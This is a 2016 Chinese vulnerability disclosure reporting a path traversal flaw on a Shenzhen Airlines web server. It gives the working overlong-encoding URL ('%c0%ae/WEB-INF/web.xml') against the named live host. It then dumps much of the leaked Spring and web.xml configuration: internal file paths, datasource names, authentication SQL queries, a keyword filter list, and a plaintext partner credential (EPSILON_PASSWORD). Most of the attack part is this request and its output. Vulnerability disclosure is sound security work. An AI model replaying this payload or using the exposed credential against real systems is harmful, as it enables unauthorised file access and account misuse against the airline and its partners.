深圳航空java容器字符集解析不当导致任意文件遍历

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-09: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

简要描述:

深圳航空java容器字符集解析不当导致任意文件遍历

详细说明:

#1 存在漏洞服务器

http://miaosha.shenzhenair.com

#2 漏洞地址

code 区域
http://miaosha.shenzhenair.com/%c0%ae/WEB-INF/web.xml





code 区域
<bean id="uiueGroupBuyingDao" title="com.iss.szair.b2c.uiue.groupBuying.dao.impl.GroupBuyingDaoImpl"/>
<bean id="groupBuyingBiz" title="com.iss.szair.b2c.uiue.groupBuying.bizlogic.impl.UiueGroupBuyingBiz">
<property name="groupBuyingDao">
<ref local="uiueGroupBuyingDao"/>
</property>
</bean>
<!-- ADD BY YUJIA NEB-625 20141117 END -->
<!-- add by li-ji 20141112 NEB-625 机票团购-展示 start -->
<bean id="IShowPromotionDao" title="com.iss.szair.b2c.groupBuying.dao.impl.ShowPromotionDaoImpl"/>
<bean id="IShowPromotionBiz" title="com.iss.szair.b2c.groupBuying.bizlogic.impl.ShowPromotionBiz">
<property name="showPromotionDao">
<ref local="IShowPromotionDao"/>
</property>
</bean>
<bean id="IShowPromotionUiueDao" title="com.iss.szair.b2c.uiue.groupBuying.dao.impl.ShowPromotionUiueDaoImpl"/>
<bean id="IShowPromotionUiueBiz" title="com.iss.szair.b2c.uiue.groupBuying.bizlogic.impl.ShowPromotionUiueBiz">
<property name="showPromotionUiueDao">
<ref local="IShowPromotionUiueDao"/>
</property>
</bean>
<!-- add by li-ji 20141028 NEB-625 机票团购-展示end -->
<bean id="IAuctionPubBiz" title="com.iss.szair.b2c.auction.bizlogic.AuctionPubBiz">
<property name="auctionPubDao">
<ref local="IAuctionPubDao"/>
</property>
</bean>
<bean id="IAuctionPubDao" title="com.iss.szair.b2c.auction.dao.oracle.AuctionPubDaoImpl"></bean>
<bean id="IAuctionRecordBiz" title="com.iss.szair.b2c.auction.bizlogic.AuctionRecordBiz">
<property name="auctionRecordDao">
<ref local="IAuctionRecordDao"/>
</property>
</bean>
<bean id="IAuctionRecordDao" title="com.iss.szair.b2c.auction.dao.oracle.AuctionRecordDaoImpl"></bean>
<!--
==========================add by hlkang for auction==========================
-->
<bean id="authenticationManager" title="org.acegisecurity.providers.ProviderManager">
<property name="providers">
<list>
<!-- <ref local="mybean"/> -->
<ref local="daoAuthenticationProvider"/>
<ref local="anonymousAuthenticationProvider"/>
</list>
</property>
</bean>
<bean id="anonymousProcessingFilter" title="org.acegisecurity.providers.anonymous.AnonymousProcessingFilter">
<property name="key">
<value>foobar</value>
</property>
<property name="userAttribute">
<value>anonymousUser,AUTH_ANONYMOUS</value>
</property>
</bean>
<bean id="daoAuthenticationProvider" title="org.acegisecurity.providers.dao.DaoAuthenticationProvider">
<property name="userDetailsService" ref="jdbcDaoImpl"/>
<property name="userCache">
<ref local="userCache"/>
</property>
<!-- if you do not want encode password -->
<property name="passwordEncoder" ref="passwordEncoder"/>
</bean>
<bean id="passwordEncoder" title="org.acegisecurity.providers.encoding.Md5PasswordEncoder"/>
<bean id="loggerListener" title="org.acegisecurity.event.authentication.LoggerListener"/>
<bean id="jdbcDaoImpl" title="org.acegisecurity.userdetails.jdbc.JdbcDaoImpl">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
<property name="usersByUsernameQuery">
<value>
SELECT user_sAccount, User_sPassword,1 FROM Sys_user WHERE User_sAccount=?
</value>
<!--
<value>SELECT user_sAccount, User_sPassword,User_nIsEnabled FROM Sys_user WHERE User_sAccount=?</value>
-->
</property>
<property name="authoritiesByUsernameQuery">
<value>
select u.User_sAccount,auth.Auth_sName from Sys_AuthRole authrel,Sys_Auth auth,Sys_User u,Sys_OrgRelation rel1,Sys_PostRole rel2 WHERE u.User_sAccount = ? and u.User_sID=rel1.OrRe_sNode and rel1.OrRe_sParentNode=rel2.PoRo_sOrgNodeID and rel2.PoRo_sRoleID= authrel.AURO_SROLEID and auth.Auth_sID = authrel.AURO_SAUTHID
</value>
</property>
</bean>

 

漏洞证明:

 

code 区域
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<web-app id="WebApp_1154401509359">
<context-param id="ContextParam_1233884491862">
<param-name>contextConfigLocation</param-name>
<param-value>
/WEB-INF/titlees/com/iss/config/FrontSpringConfig.xml
</param-value>
</context-param>
<filter id="Filter_1233884491863">
<filter-name>Character Encoding</filter-name>
<filter-title>com.iss.common.CharacterEncodingFilter</filter-title>
<init-param id="InitParam_1233884491863">
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
<init-param id="InitParam_1233884491864">
<param-name>ignore</param-name>
<param-value>true</param-value>
</init-param>
</filter>
<filter id="Filter_1233884491864">
<filter-name>B2g Login Manage</filter-name>
<filter-title>com.iss.b2g.common.LoginFilter</filter-title>
<init-param id="InitParam_1233884491865">
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
<init-param id="InitParam_1233884491866">
<param-name>ignore</param-name>
<param-value>true</param-value>
</init-param>
</filter>
<filter id="Filter_1233884491865">
<filter-name>B2a Login Manage</filter-name>
<filter-title>com.iss.b2g.common.LoginFilter</filter-title>
<init-param id="InitParam_1233884491867">
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
<init-param id="InitParam_1233884491868">
<param-name>ignore</param-name>
<param-value>true</param-value>
</init-param>
</filter>
<filter id="Filter_1379346676944">
<filter-name>ProductExtendFilter</filter-name>
<filter-title>com.iss.common.ProductExtendFilter</filter-title>
</filter>
<!-- add by jinqr 20140326 NEB-BUG316 安全漏洞 start -->
<filter id="Filter_1233884491871">
<filter-name>IllegalCharacterFilter</filter-name>
<filter-title>com.iss.common.IllegalCharacterFilter</filter-title>
<init-param id="InitParam_1233884491871">
<param-name>characterParams</param-name>
<param-value>',",<,></param-value>
</init-param>
</filter>
<!-- add by jinqr 20140326 NEB-BUG316 安全漏洞 end -->
<filter id="Filter_1379346676945">
<filter-name>AllUrlFilter</filter-name>
<filter-title>com.iss.common.filter.AllUrlFilter</filter-title>
<init-param id="InitParam_1379346676944">
<param-name>includeStrings</param-name>
<param-value>
select ;select%20;script;update ;update%20;delete ;delete%20;iframe;%20and%20
</param-value>
</init-param>
<init-param id="InitParam_1379346676945">
<param-name>redirectPath</param-name>
<param-value>/</param-value>
</init-param>
<init-param id="InitParam_1379346676946">
<param-name>disabletestfilter</param-name>
<param-value>N</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>IllegalCharacterFilter</filter-name>
<url-pattern>/regist/userMgr.do</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1379346676944">
<filter-name>AllUrlFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1379346676945">
<filter-name>ProductExtendFilter</filter-name>
<servlet-name>action</servlet-name>
</filter-mapping>
<filter-mapping id="FilterMapping_1379346676946">
<filter-name>ProductExtendFilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491862">
<filter-name>B2g Login Manage</filter-name>
<url-pattern>/b2g/*</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491863">
<filter-name>B2a Login Manage</filter-name>
<url-pattern>/b2a/*</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491864">
<filter-name>Character Encoding</filter-name>
<servlet-name>action</servlet-name>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491878">
<filter-name>Character Encoding</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<listener id="Listener_1233884491878">
<listener-title>
org.springframework.web.util.IntrospectorCleanupListener
</listener-title>
</listener>
<listener id="Listener_1233884491879">
<listener-title>
org.springframework.web.context.ContextLoaderListener
</listener-title>
</listener>
<listener id="Listener_1233884491880">
<listener-title>
org.acegisecurity.ui.session.HttpSessionEventPublisher
</listener-title>
</listener>
<listener id="Listener_1233884491881">
<listener-title>com.iss.szair.b2g.account.action.ClientAccountCtrl</listener-title>
</listener>
<servlet id="Servlet_1233884439721">
<servlet-name>action</servlet-name>
<servlet-title>org.apache.struts.action.ActionServlet</servlet-title>
<init-param id="InitParam_1233884491878">
<param-name>config</param-name>
<param-value>
/WEB-INF/struts-config.xml,/WEB-INF/config/struts-config-system.xml ,/WEB-INF/config/example/struts-config-example.xml ,/WEB-INF/config/b2g/account/struts-config-account.xml ,/WEB-INF/config/b2g/advice/struts-config-advice.xml ,/WEB-INF/config/b2g/deposit/struts-config-deposit.xml ,/WEB-INF/config/b2g/query/struts-config-query.xml ,/WEB-INF/config/b2g/teamorder/struts-config-teamorder.xml ,/WEB-INF/config/hr/struts-config-hr.xml ,/WEB-INF/config/wap/struts-config-wap.xml ,/WEB-INF/config/b2a/outuser/struts-config-outuser.xml ,/WEB-INF/config/b2a/bSPReimburse/struts-config-bSPReimburseQ.xml ,/WEB-INF/config/b2a/bulletin/struts-config-bulletin.xml ,/WEB-INF/config/b2a/advice/struts-config-adviceB2a.xml ,/WEB-INF/config/b2a/agentorder/struts-config-agentorder.xml ,/WEB-INF/config/b2a/ticketStstusAlert/struts-config-ticketStstusAlert.xml ,/WEB-INF/config/b2a/Loan/struts-config-loan.xml ,/WEB-INF/config/b2a/pnr/struts-config-pnr.xml ,/WEB-INF/config/b2a/AgentReport/struts-config-agentReport.xml ,/WEB-INF/config/b2a/returnbill/struts-config-returnbill.xml ,/WEB-INF/config/b2a/manageTicket/struts-config-manageTicket.xml ,/WEB-INF/config/universiadeguess/struts-config-guess.xml ,/WEB-INF/config/secondbuy/struts-config-secondbuy.xml ,/WEB-INF/config/universiade/struts-config-universiadePhoto.xml ,/WEB-INF/config/awardsList/struts-config-awardsList.xml
<!--
,/WEB-INF/config/ticketBookingFlow/struts-config-ticketBookingFlow.xml
-->
,/WEB-INF/config/coupon/struts-config-coupon.xml ,/WEB-INF/config/ddds/struts-config-ddds.xml ,/WEB-INF/config/voucher/struts-config-voucher.xml ,/WEB-INF/config/payinterface/struts-config-payinterface.xml ,/WEB-INF/config/activity/struts-config-activity.xml ,/WEB-INF/config/questionnaire/struts-config-questionnaire.xml ,/WEB-INF/config/checkIn/struts-config-checkIn.xml ,/WEB-INF/config/uiue/struts-config-uiue.xml ,/WEB-INF/config/internationalBooking/struts-config-internationalBooking.xml ,/WEB-INF/config/internationalBooking/struts-config-test-internationalBooking.xml ,/WEB-INF/config/checksession/struts-config-checksession.xml ,/WEB-INF/config/userManager/struts-config-um.xml ,/WEB-INF/config/groupBuying/struts-config-groupBuying.xml
</param-value>
</init-param>
<init-param id="InitParam_1233884491879">
<param-name>debug</param-name>
<param-value>2</param-value>
</init-param>
<init-param id="InitParam_1233884491880">
<param-name>detail</param-name>
<param-value>2</param-value>
</init-param>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439722">
<servlet-name>InitLog</servlet-name>
<servlet-title>com.iss.system.log.InitLog4j</servlet-title>
<init-param id="InitParam_1233884491881">
<param-name>log4j-config</param-name>
<param-value>\WEB-INF\log4j.properties</param-value>
</init-param>
<init-param id="InitParam_1233884491882">
<param-name>config-relative</param-name>
<param-value>true</param-value>
</init-param>
<init-param id="InitParam_1233884491883">
<param-name>property-relative</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>4</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439723">
<servlet-name>ContextServlet</servlet-name>
<servlet-title>com.iss.config.ContextServlet</servlet-title>
<init-param id="InitParam_1233884491884">
<param-name>DataSource</param-name>
<param-value>jdbc/shem</param-value>
</init-param>
<init-param id="InitParam_1233884491885">
<param-name>FareDataSource</param-name>
<param-value>jdbc/fare</param-value>
</init-param>
<init-param id="InitParam_1233894491885">
<param-name>CacheDataSource</param-name>
<param-value>jdbc/cache</param-value>
</init-param>
<init-param id="InitParam_1233884491886">
<param-name>GlobalMessageResource</param-name>
<param-value>resources.GlobalMessageResources</param-value>
</init-param>
<init-param id="InitParam_1233884491887">
<param-name>ROOT_PATH</param-name>
<param-value/>
</init-param>
<init-param id="InitParam_1233884491888">
<param-name>appServer</param-name>
<param-value>websphere</param-value>
</init-param>
<!-- START 2013/12/21 ADD BY LI JIAN 国际票打票机追加 -->
<init-param id="InitParam_6455257">
<param-name>IBE_INTER_PRINTER_NO</param-name>
<param-value>3</param-value>
</init-param>
<!-- END 2013/12/21 ADD BY LI JIAN 国际票打票机追加 -->
<init-param id="InitParam_645525701">
<param-name>IBE_INTER_PRINTER_NO_1</param-name>
<param-value>2</param-value>
</init-param>
<init-param id="InitParam_645525702">
<param-name>IBE_INTER_PRINTER_NO_2</param-name>
<param-value>9</param-value>
</init-param>
<init-param id="InitParam_645525703">
<param-name>IBE_INTER_PRINTER_NO_3</param-name>
<param-value>10</param-value>
</init-param>
<init-param id="InitParam_645525704">
<param-name>IBE_INTER_PRINTER_NO_4</param-name>
<param-value>13</param-value>
</init-param>
<!-- START 2014/4/10 ADD BY ZHANGJ 支付平台打票机追加 -->
<init-param id="InitParam_6455258">
<param-name>IBE_PAYMENTPLAT_PRINTER_NO_1</param-name>
<param-value>12</param-value>
</init-param>
<init-param id="InitParam_6455259">
<param-name>IBE_PAYMENTPLAT_PRINTER_NO_2</param-name>
<param-value>12</param-value>
</init-param>
<!-- END 2014/4/10 ADD BY ZHANGJ 支付平台打票机追加 -->
<init-param id="InitParam_1233884491889">
<param-name>IBE_B2C_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491890">
<param-name>IBE_B2G_PRINTER_NO</param-name>
<param-value>3</param-value>
</init-param>
<init-param id="InitParam_1233884491891">
<param-name>IBE_B2A_PRINTER_NO</param-name>
<param-value>9</param-value>
</init-param>
<init-param id="InitParam_1233884491892">
<param-name>IBE_SYS_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491893">
<param-name>IBE_B2C_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491905">
<param-name>IBE_B2C_REFOUND_WF1_PRINTER_NO</param-name>
<param-value>4</param-value>
</init-param>
<init-param id="InitParam_1233884491906">
<param-name>IBE_B2C_REFOUND_WF2_PRINTER_NO</param-name>
<param-value>5</param-value>
</init-param>
<init-param id="InitParam_1233884491894">
<param-name>IBE_B2A_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491895">
<param-name>IBE_B2G_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491896">
<param-name>IBE_SYS_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<!--
add by bidi 2014-10-22 打票机轮巡出票功能,需要在发布前确认各平台打票机
将所有打票机按平台区分后,以英文;进行分隔,填入各param-value中。
-->
<init-param id="InitParam_1233837519069">
<param-name>IBE_B2C_PRINTER_NOS</param-name>
<param-value>1;6</param-value>
</init-param>
<init-param id="InitParam_1233837519070">
<param-name>IBE_PASY_PRINTER_NOS</param-name>
<param-value>7;11;12;14;15;16;17;18;19;20;21;22;23</param-value>
</init-param>
<init-param id="InitParam_1233837519071">
<param-name>IBE_INTER_PRINTER_NOS</param-name>
<param-value>2</param-value>
</init-param>
<!-- end by bidi -->
<init-param id="InitParam_1233884491897">
<param-name>IBE_CONFIG</param-name>
<param-value>PRODUCTION</param-value>
</init-param>
<init-param id="InitParam_1233884491898">
<param-name>DOWNLOAD_DIR</param-name>
<param-value>
D:\IBM\WebSphere\AppServer\installedApps\WWW-SVR\szair.ear\szair.war\download\
</param-value>
</init-param>
<init-param id="InitParam_1233884491899">
<param-name>HTTP_DIR</param-name>
<param-value>/download/</param-value>
</init-param>
<init-param id="InitParam_1233884491903">
<param-name>EPSILON_URL</param-name>
<param-value>
http://custom-apac.epsiloninteractive.com/shenzhenair/raf/RAF_friend.php
</param-value>
</init-param>
<init-param id="InitParam_1233884491904">
<param-name>EPSILON_PASSWORD</param-name>
<param-value>p=toYq4DJ8</param-value>
</init-param>
<init-param id="InitParam_1233884491907">
<param-name>MAX_SENDCODETIMES</param-name>
<param-value>3</param-value>
</init-param>
<!-- ADD by yu.yu 20140325 NEB-283 B2C和电粉实现单点登录 START -->
<init-param id="InitParam_1233884491908">
<param-name>DIANFEN_URL</param-name>
<param-value>http://ecfan.shenzhenair.com</param-value>
</init-param>
<!-- ADD by yu.yu 20140325 NEB-283 B2C和电粉实现单点登录 END -->
<!-- add by li-ji 20141022 NEB-626 易来易往 start -->
<!-- 1易来易往产品启用;0易来易往产品停用 -->
<init-param id="InitParam_1233884491999">
<param-name>EASY_COME_EASY_GO_FLAG</param-name>
<param-value>1</param-value>
</init-param>
<!-- add by li-ji 20141022 NEB-626 易来易往 end -->
<!-- 易来易往舱位配置 -->
<init-param id="InitParam_1233884491988">
<param-name>YLYW_TCLASS_WF</param-name>
<param-value>S</param-value>
</init-param>
<!-- add by jinqr 20141208 NEB-659 联动P舱产品 start -->
<init-param id="InitParam_1234884491999">
<param-name>LINKAGE_P_START</param-name>
<param-value>2015-03-09</param-value>
</init-param>
<init-param id="InitParam_1234884491968">
<param-name>LINKAGE_P_END</param-name>
<param-value>2015-12-31</param-value>
</init-param>
<init-param id="InitParam_1233884491978">
<param-name>LINKAGE_P_DISCOUNT_RANGE</param-name>
<param-value>30</param-value>
</init-param>
<!-- add by jinqr 20141208 NEB-659 联动P舱产品 end -->
<init-param id="InitParam_1233884491991">
<param-name>SPECIAL_LINKAGE_P_START</param-name>
<param-value>2015-07-08</param-value>
</init-param>
<init-param id="InitParam_1233884491992">
<param-name>SPECIAL_LINKAGE_P_END</param-name>
<param-value>2015-08-24</param-value>
</init-param>
<init-param id="InitParam_1233884491993">
<param-name>SPECIAL_LINKAGE_P_DISCOUNT_RANGE</param-name>
<param-value>50</param-value>
</init-param>
<init-param id="InitParam_12338123491994">
<param-name>ADVANCE_BOOKING_DAYS</param-name>
<param-value>3</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439724">
<servlet-name>BankPayServlet</servlet-name>
<servlet-title>com.iss.szair.bank.BankPayServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439725">
<servlet-name>WapBankPayServlet</servlet-name>
<servlet-title>com.iss.szair.bank.WapBankPayServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439752">
<servlet-name>EPosPayServlet</servlet-name>
<servlet-title>com.iss.szair.bank.yeepay.epos.EPosPayServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439726">
<servlet-name>ABCB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.abc.ABCB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439727">
<servlet-name>AliPayB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.alipay.AliPayB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1243957839381">
<servlet-name>AliPayB2CServlet1</servlet-name>
<servlet-title>com.iss.szair.bank.alipay.AliPayB2CServlet1</servlet-title>
</servlet>
<servlet id="Servlet_1243957839382">
<servlet-name>GZUNIONB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.gzunion.GZUNIONB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1282032627900">
<servlet-name>QuickMoneyB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.quickmpay.QuickMoneyB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1282032627999">
<servlet-name>QuickMoneyCCServlet</servlet-name>
<servlet-title>
com.iss.szair.bank.quickmpay.cc.QuickMoneyCCServlet
</servlet-title>
</servlet>
<!-- add by xingjg NEB-80-社会化值机 start -->
<servlet id="Servlet_1282032627980">
<servlet-name>PlatformLoginServlet</servlet-name>
<servlet-title>com.iss.szair.b2c.checkin.platform.LoginServlet</servlet-title>
</servlet>
<!-- add by xingjg NEB-80-社会化值机 end -->
<servlet id="Servlet_1337167838755">
<servlet-name>WyzxB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.wyzxen.WyzxB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1282032627901">
<servlet-name>BOCOMB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.bocom.BOCOMB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439728">
<servlet-name>BCB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.bc.BCB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439729">
<servlet-name>CCBB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.ccb.CCBB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439730">
<servlet-name>CCBWapB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.ccb.CCBWapB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439731">
<servlet-name>CMBB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.cmb.CMBB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439732">
<servlet-name>CHINAPNRB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439733">
<servlet-name>CHINAPNRB2CServlet1</servlet-name>
<servlet-title>com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet1</servlet-title>
</servlet>
<servlet id="Servlet_1233884439734">
<servlet-name>CHINAPNRMASB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.chinapnr.CHINAPNRMASB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439735">
<servlet-name>CHINAPNRMASB2CRefundServlet</servlet-name>
<servlet-title>
com.iss.szair.bank.chinapnr.CHINAPNRMASB2CRefundServlet
</servlet-title>
</servlet>
<servlet id="Servlet_1233884439736">
<servlet-name>ICBCB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.icbc.ICBCB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439737">
<servlet-name>SDBB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.sdb.SDBB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439738">
<servlet-name>SZSHPDB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.spdb.SZSHPDB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439739">
<servlet-name>SZUnionServlet</servlet-name>
<servlet-title>com.iss.szair.bank.szunion.SZUNIONB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439740">
<servlet-name>YeePay2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.yeepay.YeePay2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439741">
<servlet-name>TenPayB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.tenpay.TenPayB2CServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439742">
<servlet-name>SelectCityServlet</servlet-name>
<servlet-title>com.iss.szair.common.servlet.SelectCityServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439743">
<servlet-name>CrmScoreServlet</servlet-name>
<servlet-title>
com.oaking.shem.webservice.kingclub.CrmScoreServlet
</servlet-title>
</servlet>
<servlet id="Servlet_1233884439744">
<servlet-name>ChineseWordServlet</servlet-name>
<servlet-title>com.iss.szair.common.servlet.ChineseWordServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439745">
<servlet-name>AxisServlet</servlet-name>
<display-name>Apache-Axis Servlet</display-name>
<servlet-title>org.apache.axis.transport.http.AxisServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439746">
<servlet-name>AdminServlet</servlet-name>
<display-name>Axis Admin Servlet</display-name>
<servlet-title>org.apache.axis.transport.http.AdminServlet</servlet-title>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439747">
<servlet-name>SOAPMonitorService</servlet-name>
<display-name>SOAPMonitorService</display-name>
<servlet-title>org.apache.axis.monitor.SOAPMonitorService</servlet-title>
<init-param id="InitParam_1233884491900">
<param-name>SOAPMonitorPort</param-name>
<param-value>5001</param-value>
</init-param>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439748">
<servlet-name>Barbecue</servlet-name>
<servlet-title>net.sourceforge.barbecue.BarcodeServlet</servlet-title>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439749">
<servlet-name>AjaxServlet</servlet-name>
<servlet-title>com.shenzhenair.shem.gift.checkCardServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439750">
<servlet-name>dwr-invoker</servlet-name>
<display-name>DWR Servlet</display-name>
<servlet-title>uk.ltd.getahead.dwr.DWRServlet</servlet-title>
<init-param id="InitParam_1233884491901">
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param id="InitParam_1233884491902">
<param-name>crossDomainSessionSecurity</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>10</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439751">
<servlet-name>SearchEngineServlet</servlet-name>
<display-name>Search Engine Servlet</display-name>
<servlet-title>com.szair.common.SearchEngineServlet</servlet-title>
</servlet>
<servlet id="Servlet_1233884439753">
<servlet-name>BarcodeServlet</servlet-name>
<servlet-title>org.krysalis.barcode4j.servlet.BarcodeServlet</servlet-title>
</servlet>
<servlet id="Servlet_9082011072202">
<servlet-name>FindPasswordServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.regist.servlet.FindPasswordServlet
</servlet-title>
</servlet>
<servlet id="Servlet_9282011072202">
<servlet-name>ValidateUserServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.regist.servlet.ValidateUserServlet
</servlet-title>
</servlet>
<servlet id="Servlet_1233884439754">
<servlet-name>BarcodeErrorServlet</servlet-name>
<servlet-title>org.krysalis.barcode4j.webapp.BarcodeErrorServlet</servlet-title>
</servlet>
<servlet id="Servlet_1282032627902">
<servlet-name>TejiaMailBookServlet</servlet-name>
<servlet-title>com.szair.common.TejiaMailBookServlet</servlet-title>
</servlet>
<servlet id="Servlet_image">
<servlet-name>CheckImageServlet</servlet-name>
<servlet-title>com.iss.szair.common.servlet.CheckImageServlet</servlet-title>
</servlet>
<!-- 邮政储蓄支付处理Servlet add by SunC -->
<servlet id="Servlet_1282032627904">
<servlet-name>PSBCB2CServlet</servlet-name>
<servlet-title>com.iss.szair.bank.psbc.PSBCB2CServlet</servlet-title>
</servlet>
<!--
ADD By li-jun-neu 20140126 NEB-93 B2C 使用支付平台接口 Start
-->
<servlet id="Servlet_6455259">
<servlet-name>PaymentServlet</servlet-name>
<servlet-title>
com.iss.scm.returnbill.payment.servlet.PaymentPlantServlet
</servlet-title>
</servlet>
<!-- ADD By li-jun-neu 20140126 NEB-93B2C 使用支付平台接口 End -->
<!-- pujian payinterface -->
<servlet id="Servlet_6455257">
<servlet-name>PaymentGuoNeiPlantServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.payinterface.payment.servlet.PaymentGuoNeiPlantServlet
</servlet-title>
</servlet>
<servlet id="Servlet_6455258">
<servlet-name>PaymentGuoNeiPlantNotifyServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.payinterface.payment.servlet.PaymentGuoNeiPlantNotifyServlet
</servlet-title>
</servlet>
<servlet id="Servlet_64552590">
<servlet-name>NewAPINotifyServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.payinterface.payment.servlet.NewAPINotifyServlet
</servlet-title>
</servlet>
<servlet id="Servlet_6455255">
<servlet-name>PaymentPlantServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.internationalBooking.payment.servlet.PaymentPlantServlet
</servlet-title>
</servlet>
<servlet id="Servlet_6455256">
<servlet-name>PaymentPlantNotifyServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.internationalBooking.payment.servlet.PaymentPlantNotifyServlet
</servlet-title>
</servlet>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 Start
-->
<servlet id="Servlet_1282032627905">
<servlet-name>RandomImgServlet</servlet-name>
<servlet-title>com.iss.szair.common.servlet.RandomImgServlet</servlet-title>
</servlet>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 END
-->
<servlet id="Servlet_1282032627998">
<servlet-name>CheckImageServlet3D</servlet-name>
<servlet-title>com.iss.szair.common.servlet.CheckImageServlet3D</servlet-title>
</servlet>
<servlet id="Servlet_1282032627907">
<servlet-name>CheckImageServlet3DNew</servlet-name>
<servlet-title>
com.iss.szair.common.servlet.CheckImageServlet3DNew
</servlet-title>
</servlet>
<servlet id="Servlet_1282032627909">
<servlet-name>InterCheckImageServlet3D</servlet-name>
<servlet-title>
com.iss.szair.b2c.internationalBooking.common.InterCheckImageServlet3D
</servlet-title>
</servlet>
<servlet id="Servlet_1282032627911">
<servlet-name>SavePriceServlet</servlet-name>
<servlet-title>com.iss.szair.common.servlet.SavePriceServlet</servlet-title>
</servlet>
<!-- add by yudx 20141204 neb-536 官网UIUIE快捷支付 start -->
<servlet id="Servlet_64552591">
<servlet-name>PaymentUiueNotifyServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.uiue.servlet.PaymentUiueNotifyServlet
</servlet-title>
</servlet>
<servlet id="Servlet_64552601">
<servlet-name>PaymentUiueReturnServlet</servlet-name>
<servlet-title>
com.iss.szair.b2c.uiue.servlet.PaymentUiueReturnServlet
</servlet-title>
</servlet>
